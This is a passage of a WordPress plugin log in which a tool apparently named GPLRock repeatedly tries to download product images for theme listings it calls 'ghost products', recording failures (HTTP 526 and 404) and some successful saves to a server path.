. Retrying... [05-Apr-2026 08:04:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cassida---hotel-booking-wordpress-theme-27252.webp for product cassida-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:16 UTC] GPLRock WARNING: Image download failed for product cassida-hotel-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cassida---hotel-booking-wordpress-theme-27252.webp [05-Apr-2026 08:04:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cassida-hotel-booking-wordpress-theme [05-Apr-2026 08:04:16 UTC] GPLRock: Image download failed for product taranto-wordpress-portfolio-for-creatives (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:18 UTC] GPLRock: Image download failed for product taranto-wordpress-portfolio-for-creatives (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/taranto---wordpress-portfolio-for-creatives-30887.webp for product taranto-wordpress-portfolio-for-creatives after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:21 UTC] GPLRock: Image download failed for product taranto-wordpress-portfolio-for-creatives (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:23 UTC] GPLRock: Image download failed for product taranto-wordpress-portfolio-for-creatives (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/taranto---wordpress-portfolio-for-creatives-30887.webp for product taranto-wordpress-portfolio-for-creatives after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:25 UTC] GPLRock WARNING: Image download failed for product taranto-wordpress-portfolio-for-creatives. URL: https://meldwp.com/wp-content/uploads/taranto---wordpress-portfolio-for-creatives-30887.webp [05-Apr-2026 08:04:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: taranto-wordpress-portfolio-for-creatives [05-Apr-2026 08:04:25 UTC] GPLRock: Image download failed for product glamr-hair-salon-hairdresser-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:27 UTC] GPLRock: Image download failed for product glamr-hair-salon-hairdresser-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glamr---hair-salon--hairdresser-wordpress-theme-9621.webp for product glamr-hair-salon-hairdresser-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:29 UTC] GPLRock: Image download failed for product glamr-hair-salon-hairdresser-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:31 UTC] GPLRock: Image download failed for product glamr-hair-salon-hairdresser-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glamr---hair-salon--hairdresser-wordpress-theme-9621.webp for product glamr-hair-salon-hairdresser-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:33 UTC] GPLRock WARNING: Image download failed for product glamr-hair-salon-hairdresser-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/glamr---hair-salon--hairdresser-wordpress-theme-9621.webp [05-Apr-2026 08:04:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: glamr-hair-salon-hairdresser-wordpress-theme [05-Apr-2026 08:04:34 UTC] GPLRock: Image download failed for product kolumn-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:36 UTC] GPLRock: Image download failed for product kolumn-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kolumn---blog-wordpress-theme-20243.webp for product kolumn-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:38 UTC] GPLRock: Image download failed for product kolumn-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:40 UTC] GPLRock: Image download failed for product kolumn-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kolumn---blog-wordpress-theme-20243.webp for product kolumn-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:42 UTC] GPLRock WARNING: Image download failed for product kolumn-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kolumn---blog-wordpress-theme-20243.webp [05-Apr-2026 08:04:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kolumn-blog-wordpress-theme [05-Apr-2026 08:04:57 UTC] GPLRock: Image download failed for product wotech-it-service-business-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:59 UTC] GPLRock: Image download failed for product wotech-it-service-business-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wotech---it-service--business-wordpress-theme--rtl-1884.webp for product wotech-it-service-business-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:01 UTC] GPLRock: Image download failed for product wotech-it-service-business-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:03 UTC] GPLRock: Image download failed for product wotech-it-service-business-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wotech---it-service--business-wordpress-theme--rtl-1884.webp for product wotech-it-service-business-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:05 UTC] GPLRock WARNING: Image download failed for product wotech-it-service-business-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/wotech---it-service--business-wordpress-theme--rtl-1884.webp [05-Apr-2026 08:05:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wotech-it-service-business-wordpress-theme-rtl [05-Apr-2026 08:05:06 UTC] GPLRock: Image download failed for product eagle-logistics-transportation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:08 UTC] GPLRock: Image download failed for product eagle-logistics-transportation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eagle---logistics--transportation-wordpress-theme-5298.webp for product eagle-logistics-transportation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:10 UTC] GPLRock: Image download failed for product eagle-logistics-transportation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:12 UTC] GPLRock: Image download failed for product eagle-logistics-transportation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eagle---logistics--transportation-wordpress-theme-5298.webp for product eagle-logistics-transportation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:14 UTC] GPLRock WARNING: Image download failed for product eagle-logistics-transportation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eagle---logistics--transportation-wordpress-theme-5298.webp [05-Apr-2026 08:05:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eagle-logistics-transportation-wordpress-theme [05-Apr-2026 08:05:14 UTC] GPLRock: Image download failed for product technofy-it-services-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:16 UTC] GPLRock: Image download failed for product technofy-it-services-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/technofy--it-services--solutions-wordpress-theme-8976.webp for product technofy-it-services-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:18 UTC] GPLRock: Image download failed for product technofy-it-services-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:21 UTC] GPLRock: Image download failed for product technofy-it-services-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/technofy--it-services--solutions-wordpress-theme-8976.webp for product technofy-it-services-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:23 UTC] GPLRock WARNING: Image download failed for product technofy-it-services-solutions-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/technofy--it-services--solutions-wordpress-theme-8976.webp [05-Apr-2026 08:05:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: technofy-it-services-solutions-wordpress-theme [05-Apr-2026 08:05:23 UTC] GPLRock: Image download failed for product simple-article-wordpress-theme-for-personal-blog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:25 UTC] GPLRock: Image download failed for product simple-article-wordpress-theme-for-personal-blog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-article---wordpress-theme-for-personal-blog-26226.webp for product simple-article-wordpress-theme-for-personal-blog after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:27 UTC] GPLRock: Image download failed for product simple-article-wordpress-theme-for-personal-blog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:29 UTC] GPLRock: Image download failed for product simple-article-wordpress-theme-for-personal-blog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-article---wordpress-theme-for-personal-blog-26226.webp for product simple-article-wordpress-theme-for-personal-blog after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:31 UTC] GPLRock WARNING: Image download failed for product simple-article-wordpress-theme-for-personal-blog. URL: https://meldwp.com/wp-content/uploads/simple-article---wordpress-theme-for-personal-blog-26226.webp [05-Apr-2026 08:05:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simple-article-wordpress-theme-for-personal-blog [05-Apr-2026 08:05:31 UTC] GPLRock: Image download failed for product goldsmith-jewelry-store-woocommerce-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:34 UTC] GPLRock: Image download failed for product goldsmith-jewelry-store-woocommerce-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/goldsmith---jewelry-store-woocommerce-elementor-theme-22973.webp for product goldsmith-jewelry-store-woocommerce-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:36 UTC] GPLRock: Image download failed for product goldsmith-jewelry-store-woocommerce-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:38 UTC] GPLRock: Image download failed for product goldsmith-jewelry-store-woocommerce-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/goldsmith---jewelry-store-woocommerce-elementor-theme-22973.webp for product goldsmith-jewelry-store-woocommerce-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:40 UTC] GPLRock WARNING: Image download failed for product goldsmith-jewelry-store-woocommerce-elementor-theme. URL: https://meldwp.com/wp-content/uploads/goldsmith---jewelry-store-woocommerce-elementor-theme-22973.webp [05-Apr-2026 08:05:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: goldsmith-jewelry-store-woocommerce-elementor-theme [05-Apr-2026 08:05:40 UTC] GPLRock: Image download failed for product adin-advertising-ppc-agency-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:42 UTC] GPLRock: Image download failed for product adin-advertising-ppc-agency-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adin---advertising--ppc-agency-elementor-wordpress-theme-32511.webp for product adin-advertising-ppc-agency-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:44 UTC] GPLRock: Image download failed for product adin-advertising-ppc-agency-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:46 UTC] GPLRock: Image download failed for product adin-advertising-ppc-agency-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adin---advertising--ppc-agency-elementor-wordpress-theme-32511.webp for product adin-advertising-ppc-agency-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:49 UTC] GPLRock WARNING: Image download failed for product adin-advertising-ppc-agency-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/adin---advertising--ppc-agency-elementor-wordpress-theme-32511.webp [05-Apr-2026 08:05:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adin-advertising-ppc-agency-elementor-wordpress-theme [05-Apr-2026 08:05:49 UTC] GPLRock: Image download failed for product eileen-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:51 UTC] GPLRock: Image download failed for product eileen-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eileen---portfolio-wordpress-theme-30521.webp for product eileen-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:53 UTC] GPLRock: Image download failed for product eileen-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:55 UTC] GPLRock: Image download failed for product eileen-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eileen---portfolio-wordpress-theme-30521.webp for product eileen-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:05:57 UTC] GPLRock WARNING: Image download failed for product eileen-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eileen---portfolio-wordpress-theme-30521.webp [05-Apr-2026 08:05:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eileen-portfolio-wordpress-theme [05-Apr-2026 08:05:57 UTC] GPLRock: Image download failed for product shopaddict-16-ready-wordpress-landing-pages-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:05:59 UTC] GPLRock: Image download failed for product shopaddict-16-ready-wordpress-landing-pages-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shopaddict---16-ready-wordpress-landing-pages-theme-10171.webp for product shopaddict-16-ready-wordpress-landing-pages-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:06:02 UTC] GPLRock: Image download failed for product shopaddict-16-ready-wordpress-landing-pages-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:04 UTC] GPLRock: Image download failed for product shopaddict-16-ready-wordpress-landing-pages-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shopaddict---16-ready-wordpress-landing-pages-theme-10171.webp for product shopaddict-16-ready-wordpress-landing-pages-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:06:06 UTC] GPLRock WARNING: Image download failed for product shopaddict-16-ready-wordpress-landing-pages-theme. URL: https://meldwp.com/wp-content/uploads/shopaddict---16-ready-wordpress-landing-pages-theme-10171.webp [05-Apr-2026 08:06:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shopaddict-16-ready-wordpress-landing-pages-theme [05-Apr-2026 08:06:06 UTC] GPLRock: Image download failed for product idoni-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:08 UTC] GPLRock: Image download failed for product idoni-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/idoni---creative-agency-wordpress-theme-26580.webp for product idoni-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:06:10 UTC] GPLRock: Image download failed for product idoni-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:13 UTC] GPLRock: Image download failed for product idoni-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/idoni---creative-agency-wordpress-theme-26580.webp for product idoni-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:06:15 UTC] GPLRock WARNING: Image download failed for product idoni-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/idoni---creative-agency-wordpress-theme-26580.webp [05-Apr-2026 08:06:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: idoni-creative-agency-wordpress-theme [05-Apr-2026 08:06:15 UTC] GPLRock: Image download failed for product odio-music-wp-theme-for-bands-clubs-and-musicians (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:17 UTC] GPLRock: Image download failed for product odio-music-wp-theme-for-bands-clubs-and-musicians (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/odio---music-wp-theme-for-bands-clubs-and-musicians-21493.webp for product odio-music-wp-theme-for-bands-clubs-and-musicians after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:06:19 UTC] GPLRock: Image download failed for product odio-music-wp-theme-for-bands-clubs-and-musicians (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:21 UTC] GPLRock: Image download failed for product odio-music-wp-theme-for-bands-clubs-and-musicians (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:06:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/odio---music-wp-theme-for-bands-clubs-and-musicians-21493.webp for product odio-music-wp-theme-for-bands-clubs-and-musicians after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:06:23 UTC] GPLRock WARNING: Image download failed for product odio-music-wp-theme-for-bands-clubs-and-musicians. URL: https://meldwp.com/wp-content/uploads/odio---music-wp-theme-for-bands-clubs-and-musicians-21493.webp [05-Apr-2026 08:06:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: odio-music-wp-theme-for-bands-clubs-and-musicians [05-Apr-2026 08:06:50 UTC] GPLRock: Image download failed for product ciyashop-responsive-multi-purpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 08:06:54 UTC] GPLRock: Image download failed for product ciyashop-responsive-multi-purpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 08:06:58 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/CiyaShop-Responsive-Multi-Purpose-WooCommerce-WordPress-Theme.jpg for product ciyashop-responsive-multi-purpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 08:07:00 UTC] GPLRock: Image download failed for product ciyashop-responsive-multi-purpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 08:07:04 UTC] GPLRock: Image download failed for product ciyashop-responsive-multi-purpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 08:07:09 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/CiyaShop-Responsive-Multi-Purpose-WooCommerce-WordPress-Theme.jpg for product ciyashop-responsive-multi-purpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 08:07:09 UTC] GPLRock WARNING: Image download failed for product ciyashop-responsive-multi-purpose-woocommerce-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/11/CiyaShop-Responsive-Multi-Purpose-WooCommerce-WordPress-Theme.jpg [05-Apr-2026 08:07:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ciyashop-responsive-multi-purpose-woocommerce-wordpress-theme [05-Apr-2026 08:07:11 UTC] GPLRock: Image downloaded successfully for product worldnews-magazine-rtl-responsive-wordpress-blog (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-faeb662d.jpg [05-Apr-2026 08:07:11 UTC] GPLRock: Using pre-downloaded image for product worldnews-magazine-rtl-responsive-wordpress-blog: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-faeb662d.jpg [05-Apr-2026 08:07:11 UTC] GPLRock: Ghost product published with image - Product ID: worldnews-magazine-rtl-responsive-wordpress-blog [05-Apr-2026 08:07:12 UTC] GPLRock: Image downloaded successfully for product grab-taxi-online-cab-service-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-391ccaa2.jpg [05-Apr-2026 08:07:12 UTC] GPLRock: Using pre-downloaded image for product grab-taxi-online-cab-service-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-391ccaa2.jpg [05-Apr-2026 08:07:12 UTC] GPLRock: Ghost product published with image - Product ID: grab-taxi-online-cab-service-wordpress-theme [05-Apr-2026 08:07:14 UTC] GPLRock: Image downloaded successfully for product eikra-education-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ae70f180.png [05-Apr-2026 08:07:14 UTC] GPLRock: Using pre-downloaded image for product eikra-education-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ae70f180.png [05-Apr-2026 08:07:14 UTC] GPLRock: Ghost product published with image - Product ID: eikra-education-wordpress-theme [05-Apr-2026 08:07:15 UTC] GPLRock: Image downloaded successfully for product framer-startup-saas-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-34f1d7cc.jpg [05-Apr-2026 08:07:16 UTC] GPLRock: Using pre-downloaded image for product framer-startup-saas-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-34f1d7cc.jpg [05-Apr-2026 08:07:16 UTC] GPLRock: Ghost product published with image - Product ID: framer-startup-saas-wordpress-theme [05-Apr-2026 08:07:18 UTC] GPLRock: Image downloaded successfully for product caspiar-digital-marketing-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b83d3f25.png [05-Apr-2026 08:07:18 UTC] GPLRock: Using pre-downloaded image for product caspiar-digital-marketing-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b83d3f25.png [05-Apr-2026 08:07:18 UTC] GPLRock: Ghost product published with image - Product ID: caspiar-digital-marketing-agency-wordpress-theme [05-Apr-2026 08:07:19 UTC] GPLRock: Image downloaded successfully for product consultio-consulting-corporate (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71467fb1.jpg [05-Apr-2026 08:07:19 UTC] GPLRock: Using pre-downloaded image for product consultio-consulting-corporate: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71467fb1.jpg [05-Apr-2026 08:07:19 UTC] GPLRock: Ghost product published with image - Product ID: consultio-consulting-corporate [05-Apr-2026 08:07:21 UTC] GPLRock: Image downloaded successfully for product molongui-authorship-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-188d22fe.jpg [05-Apr-2026 08:07:21 UTC] GPLRock: Using pre-downloaded image for product molongui-authorship-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-188d22fe.jpg [05-Apr-2026 08:07:21 UTC] GPLRock: Ghost product published with image - Product ID: molongui-authorship-pro [05-Apr-2026 08:07:24 UTC] GPLRock: Image download failed for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 08:07:28 UTC] GPLRock: Image download failed for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 08:07:32 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2023/12/OuiOui-Multi-Vendor-MarketPlace-Elementor-WooCommerce-Theme.jpg for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 08:07:34 UTC] GPLRock: Image download failed for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 08:07:46 UTC] GPLRock: Image download failed for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 0, Error: Connection timed out after 10002 milliseconds. Retrying... [05-Apr-2026 08:07:50 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2023/12/OuiOui-Multi-Vendor-MarketPlace-Elementor-WooCommerce-Theme.jpg for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 08:07:50 UTC] GPLRock WARNING: Image download failed for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme. URL: https://www.gplrock.com/wp-content/uploads/2023/12/OuiOui-Multi-Vendor-MarketPlace-Elementor-WooCommerce-Theme.jpg [05-Apr-2026 08:07:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ouioui-multi-vendor-marketplace-elementor-woocommerce-theme [05-Apr-2026 08:07:52 UTC] GPLRock: Image downloaded successfully for product vibranet-broadband-internet-service-provider-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e5a655f.jpg [05-Apr-2026 08:07:52 UTC] GPLRock: Using pre-downloaded image for product vibranet-broadband-internet-service-provider-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e5a655f.jpg [05-Apr-2026 08:07:52 UTC] GPLRock: Ghost product published with image - Product ID: vibranet-broadband-internet-service-provider-elementor-template-kit [05-Apr-2026 08:08:20 UTC] GPLRock: Image download failed for product tempa-the-luxury-hotel-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:22 UTC] GPLRock: Image download failed for product tempa-the-luxury-hotel-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tempa---the-luxury-hotel-wordpress-12987.webp for product tempa-the-luxury-hotel-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:08:24 UTC] GPLRock: Image download failed for product tempa-the-luxury-hotel-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:26 UTC] GPLRock: Image download failed for product tempa-the-luxury-hotel-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:08:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tempa---the-luxury-hotel-wordpress-12987.webp for product tempa-the-luxury-hotel-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:08:28 UTC] GPLRock WARNING: Image download failed for product tempa-the-luxury-hotel-wordpress. URL: https://meldwp.com/wp-content/uploads/tempa---the-luxury-hotel-wordpress-12987.webp [05-Apr-2026 08:08:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tempa-the-luxury-hotel-wordpress [05-Apr-2026 08:08:28 UTC] GPLRock: Image downloaded successfully for product techone-electronics-multipurpose-woocommerce-theme-rtl-supported (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4dd670c1.webp [05-Apr-2026 08:08:28 UTC] GPLRock: Using pre-downloaded image for product 